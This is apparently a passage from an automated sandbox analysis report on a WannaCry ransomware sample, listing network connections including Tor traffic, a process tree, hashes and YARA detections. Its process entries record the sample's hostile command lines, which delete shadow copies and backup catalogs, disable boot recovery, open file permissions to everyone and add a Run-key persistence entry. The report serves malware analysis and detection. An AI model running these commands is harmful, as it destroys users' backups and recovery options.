                                Jan 31, 2023 16:15:09.436908007 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.436930895 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436930895 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.436932087 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.437002897 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.437099934 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.437271118 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.437271118 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.437271118 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.437762022 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.477989912 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478239059 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478270054 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478281975 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478295088 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478305101 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478316069 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478410959 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478441954 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478497982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478497982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478530884 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478543997 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478554010 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478564978 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478575945 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478585958 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478714943 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478714943 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478748083 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478760958 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.478852987 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.478852987 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479022026 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479022026 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479049921 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479182005 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479240894 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479253054 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479263067 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479274035 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479289055 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479300022 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479310989 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479366064 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479366064 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479370117 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479372025 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479372025 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479372978 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479372978 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479384899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479394913 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479406118 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479409933 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479420900 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479432106 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479441881 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479453087 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479499102 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479510069 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479521036 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479532003 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479542971 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479553938 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479563951 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479579926 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479779959 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479779959 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.479794025 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479795933 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479796886 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479796886 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479796886 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479798079 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479798079 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479799032 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479799032 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479799986 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479799986 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479800940 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479800940 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479824066 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479836941 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479846954 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479857922 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479867935 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479878902 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479890108 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479899883 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479911089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479926109 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479937077 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479947090 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479958057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479969025 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479980946 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.479991913 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480001926 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480012894 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480022907 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480034113 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480045080 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480071068 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480081081 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480122089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480133057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480140924 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.480140924 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.480140924 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.480173111 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480227947 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480238914 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480248928 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480259895 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480277061 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480288029 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480298042 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480312109 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.480324030 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480335951 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480345964 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480356932 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480367899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480377913 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480387926 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480398893 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480408907 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480429888 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.480479002 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.480479002 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:20:20.032535076 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.151076078 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.151355028 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.155153036 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.273361921 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.274147034 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.275746107 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.394481897 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.394968987 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.513988018 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.514089108 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:20.514333010 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.514643908 CET498509001192.168.11.2018.18.82.18
                                Jan 31, 2023 16:20:20.674307108 CET90014985018.18.82.18192.168.11.20
                                Jan 31, 2023 16:20:30.075015068 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075122118 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.075364113 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075700045 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.075764894 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.149938107 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.150202990 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.152154922 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.152187109 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.152885914 CET4434985392.205.17.93192.168.11.20
                                Jan 31, 2023 16:20:30.153834105 CET49853443192.168.11.2092.205.17.93
                                Jan 31, 2023 16:20:30.196357012 CET4434985392.205.17.93192.168.11.20
                                Session ID:0
                                Source IP:192.168.11.20
                                Source Port:49824
                                Destination IP:171.25.193.9
                                Destination Port:80
                                Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe


                                Target ID:0
                                Start time:16:12:53
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\2N2jefqo8e.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\2N2jefqo8e.exe
                                Imagebase:0x400000
                                File size:3514368 bytes
                                MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.1955338620.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate

                                Target ID:3
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\attrib.exe
                                Wow64 process (32bit):true
                                Commandline:attrib +h .
                                Imagebase:0x9c0000
                                File size:19456 bytes
                                MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:4
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\icacls.exe
                                Wow64 process (32bit):true
                                Commandline:icacls . /grant Everyone:F /T /C /Q
                                Imagebase:0xea0000
                                File size:29696 bytes
                                MD5 hash:2E49585E4E08565F52090B144062F97E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:5
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:6
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:7
                                Start time:16:12:55
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 89%, ReversingLabs
                                Reputation:moderate

                                Target ID:8
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c 140021675181576.bat
                                Imagebase:0x10000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:9
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:10
                                Start time:16:12:56
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cscript.exe
                                Wow64 process (32bit):true
                                Commandline:cscript.exe //nologo m.vbs
                                Imagebase:0x6c0000
                                File size:144896 bytes
                                MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:16
                                Start time:16:13:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:18
                                Start time:16:13:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:21
                                Start time:16:14:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:24
                                Start time:16:14:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:25
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe co
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000000.2870171547.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 96%, ReversingLabs

                                Target ID:27
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:28
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:29
                                Start time:16:15:02
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe vs
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001D.00000000.2872621577.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                Target ID:30
                                Start time:16:15:04
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                Wow64 process (32bit):true
                                Commandline:TaskData\Tor\taskhsvc.exe
                                Imagebase:0x880000
                                File size:3098624 bytes
                                MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs

                                Target ID:31
                                Start time:16:15:05
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:32
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:33
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:34
                                Start time:16:15:12
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                Wow64 process (32bit):true
                                Commandline:wmic shadowcopy delete
                                Imagebase:0xe10000
                                File size:393216 bytes
                                MD5 hash:82BB8430531876FBF5266E53460A393E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:37
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 89%, ReversingLabs

                                Target ID:38
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000000.3111499881.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                Target ID:39
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                Imagebase:0x1000000
                                File size:236544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:40
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6e5c50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:41
                                Start time:16:15:26
                                Start date:31/01/2023
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                Imagebase:0x560000
                                File size:59392 bytes
                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:43
                                Start time:16:15:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:45
                                Start time:16:15:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:46
                                Start time:16:15:56
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000000.3418001639.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000002.3419901230.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security

                                Target ID:47
                                Start time:16:15:57
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskdl.exe
                                Wow64 process (32bit):true
                                Commandline:taskdl.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:49
                                Start time:16:16:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\taskse.exe
                                Wow64 process (32bit):true
                                Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:20480 bytes
                                MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:50
                                Start time:16:16:27
                                Start date:31/01/2023
                                Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                Wow64 process (32bit):true
                                Commandline:@WanaDecryptor@.exe
                                Imagebase:0x400000
                                File size:245760 bytes
                                MD5 hash:7BF2B57F2A205768755C07F238FB32CC
